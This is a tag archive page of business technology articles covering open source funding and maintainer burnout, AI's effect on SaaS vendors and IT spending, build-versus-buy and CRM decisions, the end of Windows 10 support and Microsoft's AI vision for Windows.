Tag: Software

  • The economics of open source: who pays for the code the world runs on?

    The economics of open source: who pays for the code the world runs on?

    Every day, as we reach for our smartphone, launch our favourite TV series or send a business email, we participate in the quiet miracle of modern technology. Beneath the shiny surface of apps and services lies an invisible foundation – open source software.

    It is millions of lines of code, written, refined and shared with the world for free by a global community. This code is the bloodstream of the internet and the backbone of the AI revolution.

    But this digital world, raised on the idea of freedom and collaboration, conceals a profound paradox. The global economy relies on an infrastructure created largely by volunteers, often balancing on the brink of professional burnout.

    It is as if global trade routes were based on bridges built as a hobby after hours. How long can such a structure last? Who actually pays for the code we all rely on?

    The invisible foundation: our global dependence

    Open source software is no longer an alternative. It has become the default building block of the digital world. Hard data paints a picture of almost total dependence. An analysis by Synopsys in 2024 showed that as much as 96% of the commercial code bases examined contained open source components.

    What’s more, on average, 77% of all code in these applications came from open source. It’s no longer a question of using individual libraries – it’s about building entire systems on a foundation created by the community.

    The scale of this dependency becomes even more striking when looking at the dynamics of consumption. In 2024, it was forecast that the total number of downloads of open source packages would reach the unimaginable figure of 6.6 trillion.

    The npm (JavaScript) ecosystem alone was responsible for 4.5 trillion requests, recording 70% year-on-year growth, while the AI-powered Python ecosystem (PyPI) grew by 87% to reach 530 billion downloads.

    The average commercial application today is a complex mosaic of an average of 526 different open source components. Each has its own life cycle, its own maintainers and its own potential problems.

    Cracks in the foundation: zombie code and a wake-up call called Log4j

    The ubiquity of open source is a double-edged sword. The same ease with which developers can incorporate off-the-shelf components into their projects leads to systemic neglect. The data is alarming: as many as 91% of the commercial code bases surveyed contain components that are ten or more versions out of date.

    This problem leads to so-called ‘zombie code’ – components that have had no development activity for more than two years. This phenomenon affects almost half (49%) of the applications on the market.

    This means that companies are building their critical systems on abandoned projects, without active support and, most importantly, without security patches. The consequence is a ticking time bomb: in just one year, the percentage of code bases containing high-risk security vulnerabilities has increased from 48% to 74%.

    Nothing illustrates this risk better than the December 2021 incident, when the world learned of the Log4j vulnerability. This small, free Java library for logging turned out to be embedded in millions of applications around the world.

    The vulnerability, named Log4Shell, received a maximum criticality rating of 10/10. An attacker could take full control of a server by sending a simple string of characters. US CISA director Jen Easterly called it “one of the most serious vulnerabilities she has seen in her entire career”.

    The Log4j incident became a global wake-up call, making companies brutally aware of how much their security depends on the work of anonymous volunteers.

    Worse still, even three years after the discovery of Log4Shell, up to 13% of all Log4j library downloads are still vulnerable versions. This demonstrates the profound inertia of organisations that fail to update their dependencies even in the face of a well-known, critical threat.

    The human cost of ‘free’ software: the burden of the custodian

    There are people behind every line of code. A model that treats their work as a free resource generates a huge human cost. Salvatore Sanfilippo, the creator of the Redis database, described this phenomenon as the ‘flooding effect’.

    Over time, the stream of emails, GitHub submissions and questions turns into a never-ending flood that leads to guilt over not being able to help everyone.

    The scale of this pressure is illustrated by the example of Jeff Geerling, who looks after more than 200 projects. Each day he receives between 50 and 100 notifications, of which he is only able to deal with a fraction.

    Nolan Lawson, another well-known maintainer, aptly put the emotional weight of this work. Notifications on GitHub are “a constant stream of negativity”. No one opens a notification to praise working code. People only post when something is wrong.

    This chronic pressure leads to burnout, which, in the context of open source, has clearly defined causes: demanding users, low quality contributions, lack of time and, most acutely, lack of remuneration.

    Knowing that work that consumes huge amounts of energy is the foundation for commercial products that make real profits for others is extremely demotivating. As one maintainer put it:

    “My software is free, but my time and attention is not”. Caregiver burnout is not just a personal tragedy. It is a critical risk to the global infrastructure.

    ‘Zombie code’ is a direct, measurable symptom of this crisis at the human level.

    The New Economy of Code: Towards a Sustainable Future

    In the face of these risks, the open source ecosystem is slowly maturing, moving from a volunteer-based model to more sustainable forms of funding.

    1. corporate patrons: strategy, not altruism

    At the forefront of this transformation are the technology giants. Companies such as Google, Microsoft and Red Hat have been the biggest contributors to the open source world for years. Their motivations, however, are not altruistic – they are cold, strategic calculations.

    Joint development of fundamental components (such as operating systems or containerisation) is simply more efficient. This allows them to compete at a higher level, in areas that directly differentiate their products.

    By becoming involved in key projects, corporations can also influence their direction, ensuring alignment with their own strategy.

    2 The power of institutions: the role of foundations

    The second pillar is non-profit foundations such as the Linux Foundation and the Apache Software Foundation. They act as neutral trustees for the most important projects, ensuring their stability and independence from a single corporation.

    They collect contributions from sponsors, creating a budget that allows them to fund key developers and safety audits.

    3 The maker revolution: the GitHub Sponsors model

    Alongside the big players, a new grassroots funding wave has been born. Platforms such as GitHub Sponsors allow direct, recurring contributions from users and companies, creating a revenue stream for maintainers.

    The story of Caleb Porzio, creator of Livewire and AlpineJS tools, is a prime example of the potential of this model. Standing on the brink of burnout, he decided to try his hand at the GitHub Sponsors programme.

    The real breakthrough came when he changed the paradigm: instead of asking for support, he decided to offer his sponsors additional, exclusive value. His secret turned out to be paid screencasts – a series of video tutorials.

    He reserved access to the full library exclusively for backers on GitHub. The effect was spectacular. His annual revenue grew by $80,000 in 90 days and crossed the $1 million threshold in the following years.

    This is a key lesson: a sustainable model does not have to be based on charity, but on building a viable business model around a free, open core.

    From stowaway to stakeholder

    ‘Free’ software has never been free. Its price, hitherto hidden, has been paid with the time, energy and mental health of a global army of volunteers. The model in which we treated their work as an inexhaustible resource is coming to an end.

    It is time for every participant in this ecosystem to undergo a transformation – from a passive ‘stowaway’ to an active stakeholder.

    This requires specific actions. Developers need to practice ‘software hygiene’ – regularly updating dependencies and consciously managing technical debt.

    Companies need to treat open source as a critical part of the supply chain, creating ‘software component inventories’ (SBOMs) and investing in business-critical projects. Investing in open source is not a cost, it is business continuity insurance.

    We stand at the threshold of a new era for open source – an era of professionalisation and sustainability. A future where creators are fairly remunerated and the global digital infrastructure is secure is within our reach. Building it, however, requires a conscious effort from each of us.

  • Will AI kill traditional software? Tech giants fight for the market

    Will AI kill traditional software? Tech giants fight for the market

    There is a growing debate in Silicon Valley, which last month cost the software sector almost a trillion dollars in market valuation. The question is fundamental: will generative artificial intelligence, capable of writing code and automating processes on its own, make traditional SaaS platforms redundant? Industry leaders, from Oracle to Salesforce, have moved to counterattack, arguing that their greatest asset is not the code itself, but the unique data on which they operate.

    Oracle’s Mike Sicilia and Salesforce’s Marc Benioff reject the vision of a ‘software apocalypse’ with one voice. In recent meetings with analysts, both stressed that AI is not an existential threat, but a turbocharger for existing systems. Oracle, whose shares rose 10% after optimistic forecasts, is betting on flexibility and deep embedding in financial and logistical processes. According to analysts, it is the possession of ‘proprietary data’ that provides the most effective moat against new players such as Anthropic.

    Despite the confidence of the giants, the market remains sceptical of companies whose data is easier to replace. An example is Workday, whose share price has been hit hard. Although the company manages a huge amount of HR information, critics note that HR data is often subject to rigid, standardised formats. This makes them more susceptible to replication by agile AI models.

    However, Aneel Bhusri, returning CEO of Workday, raises a compelling technical argument: today’s artificial intelligence is probabilistic – based on probabilities and patterns. Meanwhile, critical corporate systems need to be deterministic; they need to deliver the same precise result every time, especially in the area of payroll or accounting.

    Instead of obituaries, market observers suggest evolution. Salesforce is promoting its Agentforce platform, and Oracle is integrating AI into its entire technology stack, from database to end-user applications. The advantage of the traditional players comes from switching costs – companies have spent decades building operations around these tools. While AI lowers the barrier to creating new software, it will not so easily replace decades of experience in managing complex business processes.

  • Is AI the end of SaaS? The myth of free code in business

    Is AI the end of SaaS? The myth of free code in business

    In the public debate on the future of technology, a thesis that inspires euphoria in some and existential fear in others is increasingly common. Its content is deceptively simple: since artificial intelligence can generate complete application code in a few seconds, the marginal cost of software development drops to zero. In view of the fact that any user equipped with a sophisticated language model can reproduce the architecture of a powerful system in a single afternoon, traditional companies based on the Software as a Service model would supposedly lose their raison d’être. This vision is based on a fundamental cognitive error. Confusing code syntax with business service is a trap that ignores the essence of the modern digital economy.

    The real value of software has never been in the binary instruction record itself, but in the promise that this record realises. The current fascination with free code is akin to the delight in the fact that paper and ink are cheap, which would supposedly render notarial contracts or financial analyses worthless. Meanwhile, the role of the traditional SaaS model is being dramatically strengthened. It is becoming a shield separating the customer from the chaos and unpredictability of generative algorithms.

    When considering the economic foundation of this thesis, it is worth looking at the financial structure of mature technology companies. The belief in the imminent death of the industry assumes that the programming process accounts for the lion’s share of a company’s expenditure. Operational reality, however, draws a very different picture. In mature business models, the R&D budget typically oscillates around a quarter of total revenue, and the physical process of writing code itself is only a fraction of the engineering work. Most of the resources are consumed by architectural decisions, domain modelling and interpretation of intricate user requirements. The mathematics here are inexorable: the impact of artificial intelligence on the total cost structure is a few to several per cent in real terms. This is an optimisation, not a budget revolution.

    Moreover, the savings generated at the code development stage are rapidly consumed by rising operational costs. Intelligence-based software does not operate in a vacuum; it requires enormous computing power. Each query to an intelligent system generates a cost higher than a traditional database reference. As a result, the barrier to entry for new players wishing to compete solely on the price of ‘free code’ remains extremely high. It is not possible to permanently undercut the market when process costs rise along with the ambitions of the algorithms.

    In B2B relationships, trust is a rarer currency than computing power. Corporations do not pay for a collection of functions, but for system availability more than ninety-nine per cent of the time, for compliance with strict security standards, and for the certainty that data is processed according to the letter of the law. A clone of an ERP or CRM system generated by artificial intelligence remains just a digital mock-up. It lacks the legal background, certification and business continuity guarantees that constitute the operational security of the client.

    However, the problem of ‘probable rightness’ arises. In critical sectors such as banking, medicine or global logistics, an outcome that is ‘almost right’ is in fact completely wrong. These systems require a deterministic backbone – a structure that will deliver the same predictable outcome every time, regardless of the circumstances. The truly desirable software is not that which has been written entirely by artificial intelligence, but that which has been designed to be managed safely and predictably by it.

    It is worth emphasising, therefore, that the uniqueness of a solution does not come from the fact that it has code, but from the ability to turn technology into sustainable use value. The fear of devaluing the IT industry stems from the erroneous assumption that software is the end product. Meanwhile, software is merely the carrier of a service. As technology becomes more complex and unpredictable, customers will be willing to pay more and more for someone who will tame this complexity and take full responsibility for it. SaaS is undergoing a mature transformation. It is ceasing to be a tool for editing data and is becoming a guarantor of stability in an uncertain digital environment.

  • The Claude effect: Will Anthropic’s new plug-ins sink traditional software?

    The Claude effect: Will Anthropic’s new plug-ins sink traditional software?

    A narrative is beginning to dominate Silicon Valley and global financial centres that no one would have expected a year ago: financial results are no longer enough. Despite giants such as Alphabet and Amazon reporting solid growth in the cloud computing segment, markets are reacting nervously. Investors, instead of celebrating profits, are looking anxiously at the bills being footed by the AI revolution .

    The scale of spending is unprecedented. The four largest hyperscalers have signalled investment plans in excess of $600 billion this year alone. Neil Wilson, investment strategist at Saxo UK, directly suggests that the spectre of a bubble is looming over the market. This is no longer a phase of experimentation – it is a brutal war of capital destruction in which it costs hundreds of billions of dollars to enter the game, while return on investment (ROI) remains a vague promise of the future.

    The architecture of fear

    However, the concern is not just limited to spending. The real earthquake has been triggered by new tools from Anthropic, which have hit the foundations of traditional software and data analytics providers. Drops of 2-5% in one day by players such as RELX, Sage and Experian show that the market fears the ‘cannibalisation’ of legacy business models by Claude’s agile new plug-ins.

    India, where the IT outsourcing sector lost $22.5 billion in market value in a week, is particularly hard hit. If algorithms can write code and analyse data faster and cheaper than armies of programmers, the traditional technology services model needs immediate redefinition.

    Capital risk vs. operational risk

    This phenomenon creates a specific imas in the technology business. On the one hand, companies need to invest in order not to fall behind. On the other – any announcement to increase CAPEX (capital expenditure) results in immediate punishment from shareholders. Amazon, despite its great operational health, lost 8% in pre-market trading precisely because of the ‘spending frenzy’.

    There is a clear message here for business leaders: the era of unconditional optimism about AI is over. What matters now is not how much a company spends on GPUs, but how quickly these investments translate into real competitive advantage to defend against the new wave of automation. Market valuations are beginning to reward not visionaries but pragmatists who can manage the cost of innovation.

  • Two-speed IT spending. AI is eating traditional IT

    Two-speed IT spending. AI is eating traditional IT

    We are witnessing a profound polarisation of the technology market

    On the one hand, we are seeing segments with exponential growth. Huge investments are flowing towards building specialised computing centres for artificial intelligence. These are driven by strategic pressure and fear of losing competitiveness.

    On the other hand, fundamental business systems and industry applications are in a zone of pronounced caution. Their development is hampered by a period of business uncertainty and the exhaustion of the organisation with constant change.

    The problem is that the industry is investing heavily in building powerful computing engines, but neglecting to modernise the operating systems that would make effective use of this power.

    Mass computing power

    There is no doubt what is catalysing the rapid growth. Gartner is straightforward about the competition to build AIyinfrastructure and the growing demand for AI-optimised servers. This is reactive action, not just calm, strategic planning.

    This dynamic is being driven by the powerful narrative of a new industrial revolution requiring dedicated computing power. This is redefining perceptions of IT spending – it is no longer an operating expense, but is becoming a strategic investment of the magnitude of building a key industrial infrastructure.

    Moreover, Gartner rightly points out that growth in demand for servers remains constrained by insufficient supply. This market situation inevitably leads to behaviour dictated by concerns about resource availability. Organisations are buying computing power not only because they have an immediate plan to use it, but also because they fear losing access to it in the future.

    This is confirmed by analysts. Their comments suggest that current spending on generative AI is mainly coming from technology companies building the infrastructure itself. The foundations are being laid, but what about the building to stand on them?

    2025 Expenditure2025 Growth (%)2026 Expenditure2026 Growth (%)
    Data centre systems489 45146,8582 44619
    Equipment783 1578,4836 2756,8
    Software1 244 30811,91 433 03715,2
    IT services1 719 3406,51 869 2698,7
    Communication services1 304 1653,81 363 0584,5
    General IT5 540 421106 084 0859,8

    Stagnation

    This is where we arrive at the second, slower sphere of the market, where there is a completely different business climate.

    The Gartner report, the starting point of our analysis, is unequivocal on this point: growth in spending on software and services is not recovering at the same rate. In particular, industry-specific software – i.e. key systems that manage finance, logistics or production – is the most sensitive to economic fluctuations and political uncertainty.

    We are faced with a fundamental paradox: management is prepared to approve a multi-million pound investment in GPU clusters, but at the same time postpones the decision to upgrade an ageing ERP or CRM system.

    How is this possible? The answer lies in the redistribution of resources and human factors.

    Firstly, IT budgets are not unlimited. Other market analyses indicate that the projected growth in total IT budgets for 2025 is modest, often ranking below the historical average. So if AI spending is growing exponentially, and the overall budget is growing linearly, this must mean that AI investments are eating up resources at the expense of other projects.

    Secondly, there is decision-making marasm in organisations. After years of intensive digital transformation, necessitated by the pandemic, managers show less willingness to embark on further complex, multi-year modernisation projects.

    The syndrome of disappointed expectations

    This growing gap between the pace of infrastructure investment and the readiness of business applications leads us straight into a trap. It’s a scenario where initial enthusiasm collides with the hard realities of implementation, leading to deep disappointment.

    Many organisations may soon be faced with having state-of-the-art AI centres idling. The reason is simple: artificial intelligence algorithms require fuel in the form of high-quality, structured data. This data, on the other hand, is very often stuck in outdated, monolithic legacy systems – the very ones in the stagnant area.

    AI to optimise the supply chain? A great idea, provided logistics systems provide real-time data. AI is to personalise customer interactions? A modern, integrated CRM system is essential for this.

    Analysts, commenting on the PC market, note that new AI-ready PCs do not yet have the key applications that would justify replacing the hardware. The same principle, albeit on a much larger scale, applies to data centres. We are building infrastructure for applications that have not yet been developed, while neglecting to upgrade the systems that are essential to their operation.

    Strategy = integration

    This dual model of the IT market is inefficient in the long term and has high strategic risks. In 2026, the competitive advantage will not be built by those organisations that merely amassed the most computing power. The winners will be those who have been able to deeply and strategically integrate it into their core business processes.

    This means that the biggest challenge for IT directors today is not the technology purchase itself. It is ensuring investment consistency.

    The role of the CIO is evolving. From a technology manager, it is becoming a key strategist, responsible for synchronising rapid infrastructure development with the necessary modernisation of business foundations.

    If this synchronisation does not happen, the projected $6 trillion, rather than a testament to a revolution, will become a monument to a global investment in potential that has never been fully realised.

  • Competitive advantage through technology: When is it worth investing in bespoke software?

    Competitive advantage through technology: When is it worth investing in bespoke software?

    The choice of business support software is one of the key strategic decisions facing managers. The “build or buy?” dilemma goes far beyond finance and technology, defining a company’s growth path for years to come. The wrong choice can lead to inefficiency, loss of competitive advantage and even getting stuck in an expensive technology trap. While off-the-shelf solutions are tempting in terms of speed of implementation, in strategically defined circumstances, bespoke software generates a much higher long-term return on investment (ROI).

    Cost analysis: the myth of the low-cost start-up

    One of the most common mistakes is to be guided solely by the purchase price. The full financial picture is only provided by a Total Cost of Ownership (TCO) analysis, taking into account all expenses over a three- to five-year horizon. Off-the-shelf software, especially in the SaaS model, has a low entry threshold but constant recurring subscription fees. Bespoke software, on the other hand, requires a higher initial investment followed only by predictable maintenance costs, typically representing 15-25% of the original amount.

    In practice, this leads to the phenomenon of the ‘cost-cutting point’. Typically, after 2-3 years, the cumulative charges for an off-the-shelf solution equal the cost of creating bespoke software, and start to significantly exceed it in subsequent years. Added to this are hidden costs, such as fees for additional users, integrations or manual workarounds for missing features, which can increase total expenditure by up to 40% over the original assumptions.

    Strategic value: from tool to competitive advantage

    The most important advantage of bespoke software is that it fits perfectly with a company’s unique business processes. Instead of forcing the organisation to adapt and compromise, the software adapts to the organisation. Off-the-shelf systems, designed for the ‘average’ user, often force the modification of proven, unique operations. This leads to a hidden ‘process tax’, i.e. a constant loss of efficiency resulting from bending operations to the rigid framework imposed by the tool.

    Choosing bespoke software transforms technology from a freely available tool into a proprietary intellectual asset that competitors cannot copy. This allows you to build a sustainable advantage and escape the ‘sea of same technology’, where all companies in the industry, using the same platforms, begin to operate in an identical way. Market data confirms these benefits. On average, companies that invest in dedicated solutions report a 20-30% increase in operational efficiency, and those that successfully implement personalisation generate 40% more revenue. As many as 75% of IT decision-makers are convinced that this approach leads to better business results.

    Risk assessment: the dependency trap vs. project control

    Every technological decision involves risks, but the nature of these risks is fundamentally different. In the case of off-the-shelf solutions, the biggest risk is the vendor lock-in trap. The company becomes hostage to the product development plan, changes in the price list or even the decision to withdraw the service. Migrating to another system years later becomes technically complex and financially unviable. It is a chronic risk that builds up over time and gets out of control.

    The risks of bespoke software, on the other hand, are concentrated at the beginning, during the implementation phase of the project. Choosing an inexperienced partner can lead to budget overruns or delays. However, this is an acute risk, but one that is limited in time and fully manageable by the organisation. After a successful implementation, the company gains full control over the technology, its security and data.

    How to make a decision?

    In order to make the right decision, the manager should start with a strategic classification of the business need. All processes in a company can be divided into two categories: commodities and differentiators. Commodities are standard functions that are necessary for operation but do not provide an advantage, such as payroll systems. In their case, buying an off-the-shelf solution is usually the right choice. Differentiators are unique processes, proprietary algorithms or innovative customer experiences that represent a company’s strength. For these areas, you should seriously consider building your own software to protect and develop this unique resource.

    Investment in uniqueness

    The choice between bespoke software and an off-the-shelf solution is a strategic decision, not a technological one. TCO analysis exposes the myth of the cheap start-up, and building your own system allows you to turn your unique processes into a sustainable competitive advantage. Ultimately, the decision boils down to choosing a development path: one based on adapting to market standards or building your own unique path to success.

  • How the right CRM software can boost sales in B2B

    How the right CRM software can boost sales in B2B

    In the reality of many B2B companies, the sales process resembles chaos. Salespeople are drowning in emails, key customer information is lost in notebooks or scattered spreadsheets, and communication within the team is inconsistent. This operational clutter is a silent killer of results. Research shows that as many as 60% of leads in B2B are lost solely due to a lack of timely contact. The situation worsens when a key sales person leaves the company – all their knowledge disappears with them, breaking business continuity. Relying on Excel and email is a strategic risk that inhibits growth.

    CRM as a strategic command centre

    Implementing a CRM (Customer Relationship Management) system is a fundamental change in business philosophy that places the customer at the centre of all company activities. The system becomes a strategic command centre to move from reactive firefighting to proactive growth management.

    The foundation of this transformation is the centralisation of data, which creates a so-called 360-degree view of the customer. All information – contact history, transactions, offers, service requests – is collected in one easily accessible place. This ensures that every employee, regardless of department, has the full context of the relationship with the company. This eliminates chaos and builds a consistent, professional image. This centralisation creates a single source of truth (Single Source of Truth) within the organisation, which is the backbone of effective collaboration and a prerequisite for implementing advanced strategies such as personalisation or automation.

    The anatomy of growth: how do CRM functions translate into results?

    The promise of increased sales is not an empty slogan. It is the result of the synergy of several key mechanisms that a CRM system sets in motion within an organisation.

    Increasing team productivity

    One of the best-documented results of CRM implementation is an increase in efficiency. Data from Nucleus Research shows that companies implementing CRM see an average increase in employee productivity of 34%, while reducing labour costs by 27%. This is because CRM automates routine tasks such as sending reminders, generating reports or preparing standard offers. This frees up valuable time for salespeople, who can focus on building relationships and finalising deals. Mobile access to the CRM further increases the productivity of employees in the field by an average of 14.6%.

    Shortening the sales cycle

    In B2B sales, time is money. CRM directly shortens the sales cycle, with studies showing a reduction of up to 20-30% in this time. This is made possible by intelligent lead qualification, which allows the team to focus on the most promising opportunities. Instead of wasting resources on contacts that are not promising, the system allows them to be prioritised, directing energy to where the likelihood of success is greatest.

    Increase in conversion and transaction value

    Access to the full history of interactions allows for the creation of personalised offers that respond precisely to the customer’s needs, which significantly increases the likelihood of conversion. By analysing the data collected, the CRM system also becomes a tool for identifying cross-selling and upselling opportunities. An Aberdeen Group study showed that companies actively using CRM for this purpose increased their revenue from these activities by 32%. In addition, analysing sales funnel data allows much more accurate forecasts to be made. According to a Salesforce study, companies using CRM have 29% more accurate sales forecasts.

    CRM is a marathon, not a sprint: the power of customer retention

    Acquiring a new customer is on average 5 to 7 times more expensive than retaining an existing one. Research published in the Harvard Business Review shows that increasing customer retention rates by just 5% can translate into a 25% to 95% increase in company profits.

    The CRM system plays a key role in building loyalty. It provides excellent after-sales service by tracking all interactions and requests, allowing for a quick and personalised response. A customer who feels looked after is more likely to stay with a company for longer. The measurable effect of this approach is that companies using CRM record an average 9.5% higher customer retention rate.

    Key to success: how to implement CRM wisely?

    Implementing CRM is a strategic initiative that goes far beyond an IT project. In order to maximise the return on investment and avoid typical pitfalls, a thoughtful and multi-phased approach is key.

    Success begins long before specific software is selected. The foundation is an in-depth analysis of current processes and a precise definition of the goals that the system is supposed to achieve. Many implementations fail precisely because of the lack of a clear vision. Instead of general assumptions, successful companies use the SMART methodology, setting measurable goals such as ‘reducing the average sales cycle by 15% in nine months’. Such precision gives the entire project direction and allows a realistic assessment of its success.

    Another pillar is team involvement and attention to data quality. Employee resistance is one of the most serious barriers to success, so involving future users in the system selection and configuration process is crucial. When the team feels like co-authors of the solution, their motivation to use the new tool naturally increases. Equally important is the quality of the information that will feed into the system. The ‘rubbish in, rubbish out’ principle is inexorable here. Therefore, a thorough audit and cleaning of databases prior to migration is an absolute necessity to make CRM a reliable source of knowledge rather than a digital mess.

    Implementation is not the end, but the beginning of a continuous optimisation process. To be sure that the investment is delivering the expected results, it is essential to define and regularly monitor key performance indicators (KPIs). Metrics such as Win Rate or Customer Lifetime Value (CLV) provide hard data on the effectiveness of activities. This cycle of measuring results, gathering feedback from users and adjusting processes allows you to realise the full potential of your system and maximise your return on investment.

    Investment in predictable growth

    A CRM system transforms sales from an unpredictable ‘art’ to a measurable data-driven ‘science’. The financial argument is unassailable. Investment in CRM is not a cost, but one of the most profitable decisions. Nucleus Research shows that the return on this investment (ROI) averages as much as $8.71 profit for every dollar invested. Implementing CRM is a strategic priority for any B2B company that aspires to achieve a sustainable competitive advantage and secure dynamic, scalable growth.

  • The clock for Windows 10 is ticking. Companies face an inevitable decision

    The clock for Windows 10 is ticking. Companies face an inevitable decision

    On 14 October 2025, Microsoft will end free support for Windows 10, a date that should be highlighted in red in every IT manager’s calendar.

    After this date, computers running this system will stop receiving key security updates, making them an easy target for cyber attacks.

    Even though there is just over a year left until the end of support, a huge part of the market is still ignoring the upcoming changes. This is a mistake that could cost companies much more than the price of new licences and hardware.

    Resistance to matter and the illusion of safety

    The market data is clear. Despite the growing popularity of Windows 11, its predecessor still dominates a huge number of machines. According to Statcounter data from August 2025, Windows 10 is still running on more than 55% of Microsoft PCs worldwide. Why the resistance to change?

    The reasons are understandable. Users value Windows 10 for its familiar interface and stability of operation. From a business perspective, migration is a complex project – it involves the cost of buying new hardware, verifying software compatibility and the need to train employees.

    Many companies put off this decision, following the thinking: “if the computer still works, why change it?”.

    However, this is a dangerous illusion. In the context of cyber security, the argument “it still works” has no value. A system without updates is like a house with the door wide open. Any newly discovered security vulnerability will remain there forever, giving attackers constant and easy access to company data. The cost of a single successful ransomware attack or data leak can outweigh the expense of infrastructure upgrades many times over.

    A technological imperative, not a manufacturer’s whim

    There has been a lot of controversy surrounding the Windows 11 hardware requirements, but this is not due to any ill will on Microsoft’s part. Modern operating systems base their security architecture on features integrated directly into the hardware.

    These include mechanisms such as TPM 2.0 (Trusted Platform Module), which enables encryption at the chipset level, and Secure Boot, which protects the boot process from malware.

    Older computers simply do not have these components, making it impossible to implement a full, multi-layered protection model. Continuing to support incompatible hardware would mean a security compromise that cannot be afforded in today’s threat landscape.

    What do we gain? New opportunities and competitive advantages

    Migrating to Windows 11 is not only a necessity dictated by security, but also an opportunity to implement tools that make a real difference to productivity.

    • Integration with AI: Functions such as Copilot are deeply integrated into the system, assisting employees in writing texts, analysing data or creating presentations. These are tools that speed up work and automate repetitive tasks.
    • Deeper integration with the cloud: Data synchronisation, backup and collaboration in distributed teams run much more smoothly in Windows 11, which is crucial in the age of hybrid working.
    • Performance and efficiency: New devices with Windows 11 pre-installed are often lighter, more energy-efficient and more powerful, also thanks to support for ARM architecture. This means longer battery life and a better user experience.

    A chaotic last-minute migration is a recipe for disaster. Companies that have not yet started the process should follow a well-thought-out plan:

    1. Infrastructure audit: The first step is to inventory the hardware and software. It is important to identify which devices are compatible with Windows 11 and which need to be replaced. It is also crucial to check that business-critical applications run correctly on the new system.
    2. Create a schedule: Based on the audit, a detailed migration roadmap should be prepared, identifying which departments or user groups will be switched first. It is worth starting with pilot projects.
    3. Data management and backup: Before migration, it is crucial to create full backups of data. Modern cloud tools make this process much easier, but it requires planning.
    4. Communication and training: Employees need to understand why the change is necessary and how it will affect their daily work. Transparent communication and short training sessions will minimise resistance and fears, ensuring a smooth transition.

    The end of support for Windows 10 is a fact. Continuing to use it will be an act of conscious acceptance of risk. For companies, the question is no longer ‘whether’ to move to Windows 11, but ‘how’ and ‘when’ to organise the process. The sooner they take action, the more control they will retain over the security and future of their digital infrastructure.

  • Windows 2030: Microsoft is betting everything on AI

    Windows 2030: Microsoft is betting everything on AI

    Microsoft has revealed a glimpse of its long-term vision for the world’s most popular operating system. In a new video series, ‘Windows 2030 Vision’, the company has outlined a future where artificial intelligence is no longer an add-on, but the foundation of the entire user experience.

    The direction is clear: in six years’ time, interaction with a computer is expected to resemble a conversation with an assistant, and the keyboard and mouse may become relics of the past.

    Microsoft’s strategy follows a multi-billion dollar investment in AI technologies, including OpenAI. The conglomerate aims to fully integrate artificial intelligence into its key products, and Windows, as the gateway to the digital world for hundreds of millions of users, is at the heart of this plan.

    It is no longer just about adding features such as Copilot. The aim is to rebuild the operating system kernel itself so that it is inherently intelligent.

    In the vision set out by Vice President of Security, David Weston, the traditional graphical interface is giving way to multimodal communication.

    The operating system of the future is supposed to understand context by seeing what the user is doing on the screen and hearing their voice commands. Instead of manually clicking through menus and windows to perform a complex task, the user is to simply delegate it to an intelligent AI agent.

    Such an agent would coordinate work between different applications and files, in a similar way to how AI-integrated browsers begin to manage multiple tabs.

    This is a fundamental change that Microsoft CEO Satya Nadella has announced will transform the essence of operating systems. According to unofficial information, prototypes exploring this new interaction model are already being developed in Redmond.

    Despite the bold announcements, Microsoft’s vision is being met with a cool reception and raises numerous questions. Previous attempts to integrate AI into Windows 11, including the Copilot feature, have failed to deliver the promised productivity revolution and are often seen as imposed and underdeveloped.

    Key issues remain open, such as the significant increase in demand for system resources, privacy in a world where the computer ‘sees and hears’ our work, and the business model for such solutions.

    Users also fear being concreted in the Microsoft ecosystem, with no choice of competing AI tools. The wider social context is also hard to ignore – the vision of office automation is at odds with the wave of redundancies sweeping the tech sector.

    Its dominant position in the desktop market gives Microsoft a unique opportunity to implement its vision on a massive scale. While competing chatbots will remain confined to the application framework, an AI agent embedded in the operating system could become a ubiquitous coordinator of digital life.

    While the announcement that by 2030 keyboards and mice will become as alien to Generation Z as MS-DOS is today seems exaggerated, the direction of change is indisputable. Microsoft is betting on AI as the driving force behind the next generation of Windows.

    For users and businesses, this means adapting or, as critics suggest, seeking alternatives while there is time. The AI revolution in Windows has already begun.